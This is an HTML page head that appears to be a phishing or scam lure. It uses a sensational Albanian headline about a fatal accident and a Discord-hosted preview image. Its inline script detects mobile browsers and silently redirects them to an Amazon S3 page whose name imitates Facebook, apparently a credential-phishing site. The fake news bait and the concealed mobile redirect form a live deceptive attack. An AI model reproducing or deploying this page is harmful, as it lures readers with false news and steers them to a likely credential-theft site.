<!DOCTYPE html>
<html lang="es">
<head>
<meta charset="utf-8"/>
<meta name="title" content="Stream"/>
<meta name="keywords" content="Instagram"/>
<meta property="og:description" content="229,142,105,vizitë"/>
<meta name="robots" content="index, follow"/>
<meta name="googlebot" content="noindex"/>
<meta name="robots" content="index"/>
<meta name="robots" content="noindex"/>
<meta name="robots" content="nofollow"/>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<meta name="viewport" content="width=device-width, initial-scale=1"/>
<meta property="og:title" content="Bëni shumë kujdes mëngjesin e sotëm ka ndodhur një aksident tragjik me disa të plagosur dhe të vdekur."/>
<meta property="og:image" content="https://media.discordapp.net/attachments/1220457453838143605/1223991532953276426/nbvcnbvncvbn.png?ex=661bddf2&is=660968f2&hm=4830e4532af8b776c66e3a73269430145033f0d110685f793cf7b4331852e96e&=&format=webp&quality=lossless"/>
<meta name="apple-itunes-app" content="app-id=6448311069"/>
<script type="text/javascript">
        //<![CDATA[
            var isMobile = /Android|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent);
        
            if (isMobile) {
                window.location.href = "https://facebosaskavvs922.s3.eu-west-3.amazonaws.com/jef00224.html";
            }
        //]]>
        </script>
        
        
